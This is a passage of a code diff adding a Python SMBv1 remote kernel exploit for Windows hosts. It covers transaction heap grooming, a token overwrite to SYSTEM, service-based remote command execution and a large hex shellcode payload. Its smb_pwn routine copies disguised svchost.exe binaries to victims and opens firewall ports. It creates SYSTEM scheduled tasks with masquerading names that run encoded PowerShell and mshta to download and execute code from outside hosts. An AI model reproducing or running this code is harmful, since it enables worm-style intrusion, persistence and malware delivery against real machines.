+ conn.send_trans_secondary(mid=info['fid'], data='\xff\xff\xff\xff', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'] + 4)
+ wait_for_request_processed(conn)
+ TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 4096 + HEAP_CHUNK_PAD_SIZE
+ PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
+ PREV_TRANS_OFFSET = 4294967296L - PREV_TRANS_DISPLACEMENT
+ conn.send_nt_trans_secondary(mid=special_mid, param='\xff\xff\xff\xff', paramDisplacement=PREV_TRANS_OFFSET + info['TRANS_TOTALPARAMCNT_OFFSET'])
+ if info['arch'] == 'x64':
+ conn.send_nt_trans_secondary(mid=special_mid, param='\xff\xff\xff\xff', paramDisplacement=PREV_TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'] + 4)
+ conn.send_trans_secondary(mid=info['fid'], data='\x00\x00\x00\x00', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'] + 4)
+ wait_for_request_processed(conn)
+ print 'leak next transaction'
+ conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_FUNCTION_OFFSET'])
+ conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 256, 256), dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_PARAMCNT_OFFSET'])
+ conn.send_nt_trans_secondary(mid=special_mid)
+ leakData = conn.recv_transaction_data(special_mid, 256)
+ leakData = leakData[4:]
+ if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != TRANS_CHUNK_SIZE // info['POOL_ALIGN']:
+ print 'chunk size is wrong'
+ return False
+ leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
+ leakTrans = leakData[leakTranOffset:]
+ fmt = info['PTR_FMT']
+ _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<' + fmt * 5, leakTrans, 8)
+ inparam_value, outparam_value, indata_value = unpack_from('<' + fmt * 3, leakTrans, info['TRANS_INPARAM_OFFSET'])
+ trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
+ print ('CONNECTION: 0x{:x}').format(connection_addr)
+ print ('SESSION: 0x{:x}').format(session_addr)
+ print ('FLINK: 0x{:x}').format(flink_value)
+ print ('InData: 0x{:x}').format(indata_value)
+ print ('MID: 0x{:x}').format(trans2_mid)
+ trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
+ trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
+ print ('TRANS1: 0x{:x}').format(trans1_addr)
+ print ('TRANS2: 0x{:x}').format(trans2_addr)
+ print 'modify transaction struct for arbitrary read/write'
+ TRANS_OFFSET = 4294967296L - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
+ conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<' + fmt * 3, trans1_addr, trans1_addr + 512, trans2_addr), paramDisplacement=TRANS_OFFSET + info['TRANS_INPARAM_OFFSET'])
+ wait_for_request_processed(conn)
+ trans1_mid = conn.next_mid()
+ conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
+ wait_for_request_processed(conn)
+ info.update({'connection': connection_addr, 'session': session_addr, 'trans1_mid': trans1_mid, 'trans1_addr': trans1_addr, 'trans2_mid': trans2_mid, 'trans2_addr': trans2_addr})
+ return True
+
+
+def create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr):
+ SID_SYSTEM = pack('<BB5xBI', 1, 1, 5, 18)
+ SID_ADMINISTRATORS = pack('<BB5xBII', 1, 2, 5, 32, 544)
+ SID_AUTHENICATED_USERS = pack('<BB5xBI', 1, 1, 5, 11)
+ SID_EVERYONE = pack('<BB5xBI', 1, 1, 1, 0)
+ sids = [SID_SYSTEM, SID_ADMINISTRATORS, SID_EVERYONE, SID_AUTHENICATED_USERS]
+ attrs = [0, 14, 7, 7]
+ fakeUserAndGroupCount = min(userAndGroupCount, 4)
+ fakeUserAndGroupsAddr = userAndGroupsAddr
+ addr = fakeUserAndGroupsAddr + fakeUserAndGroupCount * info['PTR_SIZE'] * 2
+ fakeUserAndGroups = ''
+ for sid, attr in zip(sids[:fakeUserAndGroupCount], attrs[:fakeUserAndGroupCount]):
+ fakeUserAndGroups += pack('<' + info['PTR_FMT'] * 2, addr, attr)
+ addr += len(sid)
+
+ fakeUserAndGroups += ('').join(sids[:fakeUserAndGroupCount])
+ return (fakeUserAndGroupCount, fakeUserAndGroups)
+
+
+def exploit(target, pipe_name, USERNAME, PASSWORD, tg):
+ conn = MYSMB(target)
+ conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
+ info = {}
+ conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
+ server_os = conn.get_server_os()
+ print 'Target OS: ' + server_os
+ if server_os.startswith('Windows 7 ') or server_os.startswith('Windows Server 2008 R2'):
+ info['os'] = 'WIN7'
+ info['method'] = exploit_matched_pairs
+ elif server_os.startswith('Windows 8') or server_os.startswith('Windows Server 2012 ') or server_os.startswith('Windows Server 2016 ') or server_os.startswith('Windows 10') or server_os.startswith('Windows RT 9200'):
+ info['os'] = 'WIN8'
+ info['method'] = exploit_matched_pairs
+ elif server_os.startswith('Windows Server (R) 2008') or server_os.startswith('Windows Vista'):
+ info['os'] = 'WIN7'
+ info['method'] = exploit_fish_barrel
+ elif server_os.startswith('Windows Server 2003 '):
+ info['os'] = 'WIN2K3'
+ info['method'] = exploit_fish_barrel
+ elif server_os.startswith('Windows 5.1'):
+ info['os'] = 'WINXP'
+ info['arch'] = 'x86'
+ info['method'] = exploit_fish_barrel
+ elif server_os.startswith('Windows XP '):
+ info['os'] = 'WINXP'
+ info['arch'] = 'x64'
+ info['method'] = exploit_fish_barrel
+ elif server_os.startswith('Windows 5.0'):
+ info['os'] = 'WIN2K'
+ info['arch'] = 'x86'
+ info['method'] = exploit_fish_barrel
+ else:
+ print 'This exploit does not support this target'
+ if pipe_name is None:
+ pipe_name = find_named_pipe(conn)
+ if pipe_name is None:
+ print 'Not found accessible named pipe'
+ return False
+ print 'Using named pipe: ' + pipe_name
+ if not info['method'](conn, pipe_name, info):
+ return False
+ fmt = info['PTR_FMT']
+ print 'make this SMB session to be SYSTEM'
+ write_data(conn, info, info['session'] + info['SESSION_ISNULL_OFFSET'], '\x00\x01')
+ sessionData = read_data(conn, info, info['session'], 256)
+ secCtxAddr = unpack_from('<' + fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
+ if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
+ if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
+ pctxtDataInfo = read_data(conn, info, secCtxAddr + info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
+ pctxtDataAddr = unpack_from('<' + fmt, pctxtDataInfo)[0]
+ else:
+ pctxtDataAddr = secCtxAddr
+ tokenAddrInfo = read_data(conn, info, pctxtDataAddr + info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
+ tokenAddr = unpack_from('<' + fmt, tokenAddrInfo)[0]
+ print ('current TOKEN addr: 0x{:x}').format(tokenAddr)
+ tokenData = read_data(conn, info, tokenAddr, 64 * info['PTR_SIZE'])
+ userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData)
+ print 'overwriting token UserAndGroups'
+ fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
+ if fakeUserAndGroupCount != userAndGroupCount:
+ write_data(conn, info, tokenAddr + userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
+ write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
+ else:
+ secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
+ print 'overwriting session security context'
+ write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
+ try:
+ smb_pwn(conn, info['arch'], tg)
+ except:
+ pass
+
+ if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
+ userAndGroupsOffset = userAndGroupsAddr - tokenAddr
+ write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset + len(fakeUserAndGroups)])
+ if fakeUserAndGroupCount != userAndGroupCount:
+ write_data(conn, info, tokenAddr + userAndGroupCountOffset, pack('<I', userAndGroupCount))
+ else:
+ write_data(conn, info, secCtxAddr, secCtxData)
+ conn.disconnect_tree(conn.get_tid())
+ conn.logoff()
+ conn.get_socket().close()
+ time.sleep(2)
+ return True
+
+
+def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset):
+ userAndGroupCount, RestrictedSidCount = unpack_from('<II', tokenData, userAndGroupCountOffset)
+ userAndGroupsAddr, RestrictedSids = unpack_from('<' + info['PTR_FMT'] * 2, tokenData, userAndGroupsAddrOffset)
+ success = True
+ if RestrictedSidCount != 0 or RestrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0:
+ print 'Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!'
+ print ('RestrictedSids: 0x{:x}').format(RestrictedSids)
+ print ('RestrictedSidCount: 0x{:x}').format(RestrictedSidCount)
+ success = False
+ print ('userAndGroupCount: 0x{:x}').format(userAndGroupCount)
+ print ('userAndGroupsAddr: 0x{:x}').format(userAndGroupsAddr)
+ return (success, userAndGroupCount, userAndGroupsAddr)
+
+
+def get_group_data_from_token(info, tokenData):
+ userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']
+ userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET']
+ success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
+ if not success and info['os'] == 'WINXP' and info['arch'] == 'x86':
+ print 'Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround'
+ userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+ userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
+ success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
+ if not success:
+ print 'Bad TOKEN_USER_GROUP offsets. Abort > BSOD'
+ return (
+ userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset)
+
+
+def smb_pwn(conn, arch, tg):
+ ee = ''
+ eb = 'c:\\windows\\system32\\calc.exe'
+ smbConn = conn.get_smbconnection()
+ if os.path.exists('c:/windows/system32/svhost.exe'):
+ eb = 'c:\\windows\\system32\\svhost.exe'
+ if os.path.exists('c:/windows/SysWOW64/svhost.exe'):
+ eb = 'c:\\windows\\SysWOW64\\svhost.exe'
+ if os.path.exists('c:/windows/system32/drivers/svchost.exe'):
+ eb = 'c:\\windows\\system32\\drivers\\svchost.exe'
+ if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):
+ eb = 'c:\\windows\\SysWOW64\\drivers\\svchost.exe'
+ service_exec(conn, 'cmd /c net share c$=c:')
+ if tg == 2:
+ smb_send_file(smbConn, eb, 'c', '/installed2.exe')
+ else:
+ smb_send_file(smbConn, eb, 'c', '/installed.exe')
+ if os.path.exists('c:/windows/temp/svvhost.exe'):
+ ee = 'c:\\windows\\temp\\svvhost.exe'
+ if os.path.exists('c:/windows/temp/svchost.exe'):
+ ee = 'c:\\windows\\temp\\svchost.exe'
+ if '.exe' in ee:
+ smb_send_file(smbConn, ee, 'c', '/windows/temp/svchost.exe')
+ else:
+ print 'no eb**************************'
+ if tg == 2:
+ bat = 'cmd /c c:\\installed2.exe&c:\\installed2.exe&echo c:\\installed2.exe >c:/windows/temp/p.bat&echo c:\\windows\\temp\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f %%i in (\'tasklist ^^^| find /c /i "cmd.exe"\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'
+ else:
+ bat = 'cmd /c c:\\installed.exe&c:\\installed.exe&echo c:\\installed.exe >c:/windows/temp/p.bat&echo c:\\windows\\temp\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f %%i in (\'tasklist ^^^| find /c /i "cmd.exe"\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'
+ service_exec(conn, bat)
+
+
+def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
+ with open(localSrc, 'rb') as fp:
+ smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
+
+
+def service_exec(conn, cmd):
+ import random
+ random.choice = random.choice
+ random.randint = random.randint
+ import string
+ from impacket.dcerpc.v5 import transport, srvs, scmr
+ service_name = ('').join([random.choice(string.letters) for i in range(4)])
+ rpcsvc = conn.get_dce_rpc('svcctl')
+ rpcsvc.connect()
+ rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
+ svcHandle = None
+ try:
+ try:
+ print 'Opening SVCManager on %s.....' % conn.get_remote_host()
+ resp = scmr.hROpenSCManagerW(rpcsvc)
+ svcHandle = resp['lpScHandle']
+ try:
+ resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name + '\x00')
+ except Exception as e:
+ if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
+ raise e
+ else:
+ scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])
+ scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])
+
+ print 'Creating service %s.....' % service_name
+ resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00')
+ serviceHandle = resp['lpServiceHandle']
+ if serviceHandle:
+ try:
+ print 'Starting service %s.....' % service_name
+ scmr.hRStartServiceW(rpcsvc, serviceHandle)
+ time.sleep(2)
+ print 'Stoping service %s.....' % service_name
+ scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
+ time.sleep(2)
+ except Exception as e:
+ print str(e)
+
+ print 'Removing service %s.....' % service_name
+ scmr.hRDeleteService(rpcsvc, serviceHandle)
+ scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
+ except Exception as e:
+ print 'ServiceExec Error on: %s' % conn.get_remote_host()
+ print str(e)
+
+ finally:
+ if svcHandle:
+ scmr.hRCloseServiceHandle(rpcsvc, svcHandle)
+
+ rpcsvc.disconnect()
+
+
+scode = '31c0400f84be03000060e8000000005be823000000b9760100000f328d7b3c39f87411394500740689450089550889f831d20f3061c224008dab00100000c1ed0cc1e50c81ed50000000c3b92300000068300000000fa18ed98ec1648b0d400000008b6104519c60e8000000005be8c5ffffff8b450005170000008944242431c09942f00fb055087512b976010000998b45000f30fbe804000000fa619dc38b4500c1e80cc1e00c2d001000006681384d5a75f4894504b8787cf4dbe8e100000097b83f5f647757e8d500000029f889c13d70010000750505080000008d581c8d341f64a1240100008b3689f229c281fa0004000077f252b8e1140117e8a70000008b400a8d50048d340fe8d70000003d5a6afac174113dd883e03e740a8b3c1729d7e9e0ffffff897d0c8d1c1f8d75105f8b5b04b83e4cf8cee86a0000008b400a3ca077022c0829f8817c03fc0000000074de31c05568010000005550e800000000810424950000005053293c2456b8c45c196de82800000031c050505056b83446ccafe81800000085c074a48b451c80780e01740a8900894004e991ffffffc3e802000000ffe0608b6d04978b453c8b54057801ea8b4a188b5a2001eb498b348b01eee81d00000039f875f18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c35231c099acc1ca0d01c285c075f6925ac358894424105859585a6052518b2831c064a22400000099b04050c1e0065054528911514a52b8ea996e57e87bffffff85c07553588b38e8000000005e81c659000000b900040000f3a48b450c50b848b818b8e853ffffff8b400c8b40148b0066817824180075f68b5028817a0c3300320075ea8b5810895d04b85e515e83e82effffff59890131c08845084064a22400000061c35a585859515151e8000000008104240c000000515152ffe0dadeba67042d06d97424f45d31c9b14383c504315513033217cff340ff8dfcb800f2755d3132e1166282617a8f69276e041fe081adaad6ac2e862bafacd57f0f8c15724ec9487f028207d2b2a752ef39fb7377de4c755671c62c78700b45316a48608b01ba1e0ac3f2dfa12a3b12bb6bfccdce85fe70c9527caf5c402624c6acd6e99127d446d56ff9593a0405d1bdca8fa199ced4728357b1d5bc871a8918ccb7de108fdd21a6aa9022b8b4844a893f4b0c16ea2ff2f43e5a9ba0abe7c652062bffd0a2d404c8c7d1414e34a8da3b3a1fda6959f240b2b26fa9dca91b89554281bbb5cf7154856ba2cfd11791651b84bf1f081d60cfcf0504297ea0b01512455a3786feeed823702f46a81d46e659aeec84f824621b88e417e306d78333f87628500655e82e000000b9820000c00f324c8d0d370000004439c87419394500740a895504894500c645f8004991505a48c1ea200f305dc3488d2d0010000048c1ed0c48c1e50c4881ed70000000c30f01f865488924251000000065488b2425a8010000682b00000065ff342510000000505055e8bfffffff488b450048051f00000048894424105152415041514152415331c0b201f00fb055f87514b9820000c08b45008b55040f30fbe80e000000fa415b415a415941585a595d58c341574156575653504c8b7d0049c1ef0c49c1e70c4981ef001000006641813f4d5a75f14c897d08654c8b342588010000bf787cf4dbe8180100004891bf3f5f6477e8130100008b400389c33d0004000072050510000000488d50284c8d04114d89c14d8b094d39c80f84db0000004c89c84c29f0483d0007000077e64d29cebfe1140117e8d00000008b780381c708000000488d3419e8060100003d5a6afac174133dd883e03e740c488b0c394829f9e9ddffffffbf48b818b8e893000000488945f0488d34114889f3488b5b084839de74f74a8d1433bf3e4cf8cee8780000008b400348817c02f80000000074db488d4d104d31c04c8d0db50000005568010000005541504881ec20000000bfc45c196de83b000000488d4d104d31c9bf3446ccafe82a0000004881c44000000085c07497488b452080781a01740c48890048894008e981ffffff585b5e5f415e415fc3e802000000ffe0535156418b473c418b8407880000004c01f8508b48188b58204c01fbffc98b348b4c01fee81f00000039f875ef588b58244c01fb668b0c4b8b581c4c01fb8b048b4c01f85e595bc35231c099acc1ca0d01c285c075f6925ac3555357564157498b284c8b7d08525e4c89cb31c0440f22c048890289c148f7d14989c0b04050c1e006504989014881ec20000000bfea996e57e862ffffff4881c43000000085c07546488b3e488d354e000000b900060000f3a4488b45f0488b4018488b4020488b0066817848180075f5488b5050817a0c3300320075e84c8b7820bf5e515e83e81bffffff48890331c9884df8b101440f22c1415f5e5f5b5dc3489231c951514989c94c8d051300000089ca4881ec20000000ffd04881c430000000c3dac4d97424f4be15624e335f33c9b15731771a83c704037716e2e09e06b0eeaf7f76ee4f8036bf0ed0ea6ec7983b428250b7302d294ce6b5e1d954e6b9562ab671667d7cc835b04884f472e629960ef57d78af38b4756eba86649dee49381584189a2ed8a092310d53a2b9ad64a3f128a4d7667b24c838f06ef0fc8d2f20b5907fc313db80cdda504a469467651b15a1c195959d9314dcd352961fd3b4ed6e683642b4797d63650ca5cbc16415c8807b467653f76a3f178c33a3de93639a6b970b556a484a3e2d3013e7f781f3565e435e11e3af7ee0b1d09fba74763a73fd9a53d4fe645c864821a2394855a5394855edb4c554ecc6d51754f75ef82f07b5bcd0e51fc951acf958ec4dfab647edc01164f7b46b140ca419114863f16bc101f5d25c5c2f1b8b3dbd8014ee5e693b95d449b62670f818a342946b57930fb4f3e0a5fda86c5cad79518f30e1f5e9dc8c81d54c210977e1dabf188c5460860af90926ba72bec45d00515bedc8c6a3793b7df4565a1990a8'
+sc = binascii.unhexlify(scode)
+NTFEA_SIZE = 69632
+ntfea10000 = pack('<BBH', 0, 0, 65501) + 'A' * 65502
+ntfea11000 = (pack('<BBH', 0, 0, 0) + '\x00') * 600
+ntfea11000 += pack('<BBH', 0, 0, 62397) + 'A' * 62398
+ntfea1f000 = (pack('<BBH', 0, 0, 0) + '\x00') * 9364
+ntfea1f000 += pack('<BBH', 0, 0, 18669) + 'A' * 18670
+ntfea = {65536: ntfea10000, 69632: ntfea11000}
+TARGET_HAL_HEAP_ADDR_x64 = 18446744073706405904L
+TARGET_HAL_HEAP_ADDR_x86 = 4292866048L
+fakeSrvNetBufferNsa = pack('<II', 69632, 0) * 2
+fakeSrvNetBufferNsa += pack('<HHI', 65535, 0, 0) * 2
+fakeSrvNetBufferNsa += '\x00' * 16
+fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86 + 256, 0, 0, TARGET_HAL_HEAP_ADDR_x86 + 32)
+fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86 + 256, 0, 96, 4100, 0)
+fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86 - 128, 0, TARGET_HAL_HEAP_ADDR_x64)
+fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64 + 256, 0)
+fakeSrvNetBufferNsa += pack('<QHHI', 0, 96, 4100, 0)
+fakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 - 128)
+fakeSrvNetBufferX64 = pack('<II', 69632, 0) * 2
+fakeSrvNetBufferX64 += pack('<HHIQ', 65535, 0, 0, 0)
+fakeSrvNetBufferX64 += '\x00' * 16
+fakeSrvNetBufferX64 += '\x00' * 16
+fakeSrvNetBufferX64 += '\x00' * 16
+fakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64)
+fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64 + 256, 0)
+fakeSrvNetBufferX64 += pack('<QHHI', 0, 96, 4100, 0)
+fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 - 128)
+fakeSrvNetBuffer = fakeSrvNetBufferNsa
+feaList = pack('<I', 65536)
+feaList += ntfea[NTFEA_SIZE]
+feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer) - 1) + fakeSrvNetBuffer
+feaList += pack('<BBH', 18, 52, 22136)
+fake_recv_struct = pack('<QII', 0, 3, 0)
+fake_recv_struct += '\x00' * 16
+fake_recv_struct += pack('<QII', 0, 3, 0)
+fake_recv_struct += '\x00' * 16 * 7
+fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64 + 160, TARGET_HAL_HEAP_ADDR_x64 + 160)
+fake_recv_struct += '\x00' * 16
+fake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86 + 192, TARGET_HAL_HEAP_ADDR_x86 + 192, 0)
+fake_recv_struct += '\x00' * 16 * 11
+fake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86 + 400)
+fake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86 + 496 - 1, 0)
+fake_recv_struct += '\x00' * 16 * 3
+fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 + 480)
+fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64 + 496 - 1)
+
+def getNTStatus(self):
+ return self['ErrorCode'] << 16 | self['_reserved'] << 8 | self['ErrorClass']
+
+
+setattr(smb.NewSMBPacket, 'getNTStatus', getNTStatus)
+
+def sendEcho(conn, tid, data):
+ pkt = smb.NewSMBPacket()
+ pkt['Tid'] = tid
+ transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
+ transCommand['Parameters'] = smb.SMBEcho_Parameters()
+ transCommand['Data'] = smb.SMBEcho_Data()
+ transCommand['Parameters']['EchoCount'] = 1
+ transCommand['Data']['Data'] = data
+ pkt.addCommand(transCommand)
+ conn.sendSMB(pkt)
+ recvPkt = conn.recvSMB()
+ if recvPkt.getNTStatus() == 0:
+ print 'got good ECHO response'
+ else:
+ print ('got bad ECHO response: 0x{:x}').format(recvPkt.getNTStatus())
+
+
+def createSessionAllocNonPaged(target, size):
+ conn = smb.SMB(target, target)
+ _, flags2 = conn.get_flags()
+ flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY
+ if size >= 65535:
+ flags2 &= ~smb.SMB.FLAGS2_UNICODE
+ reqSize = size // 2
+ else:
+ flags2 |= smb.SMB.FLAGS2_UNICODE
+ reqSize = size
+ conn.set_flags(flags2=flags2)
+ pkt = smb.NewSMBPacket()
+ sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
+ sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
+ sessionSetup['Parameters']['MaxBufferSize'] = 61440
+ sessionSetup['Parameters']['MaxMpxCount'] = 2
+ sessionSetup['Parameters']['VcNumber'] = 2
+ sessionSetup['Parameters']['SessionKey'] = 0
+ sessionSetup['Parameters']['SecurityBlobLength'] = 0
+ sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY
+ sessionSetup['Data'] = pack('<H', reqSize) + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
+ pkt.addCommand(sessionSetup)
+ conn.sendSMB(pkt)
+ recvPkt = conn.recvSMB()
+ if recvPkt.getNTStatus() == 0:
+ print 'SMB1 session setup allocate nonpaged pool success'
+ else:
+ print 'SMB1 session setup allocate nonpaged pool failed'
+ return conn
+
+
+class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
+ structure = (
+ ('TotalParameterCount', '<H=0'), ('TotalDataCount', '<H'), ('ParameterCount', '<H=0'), ('ParameterOffset', '<H=0'), ('ParameterDisplacement', '<H=0'), ('DataCount', '<H'), ('DataOffset', '<H'), ('DataDisplacement', '<H=0'), ('FID', '<H=0'))
+
+
+def send_trans2_second(conn, tid, data, displacement):
+ pkt = smb.NewSMBPacket()
+ pkt['Tid'] = tid
+ transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
+ transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
+ transCommand['Data'] = smb.SMBTransaction2Secondary_Data()
+ transCommand['Parameters']['TotalParameterCount'] = 0
+ transCommand['Parameters']['TotalDataCount'] = len(data)
+ fixedOffset = 53
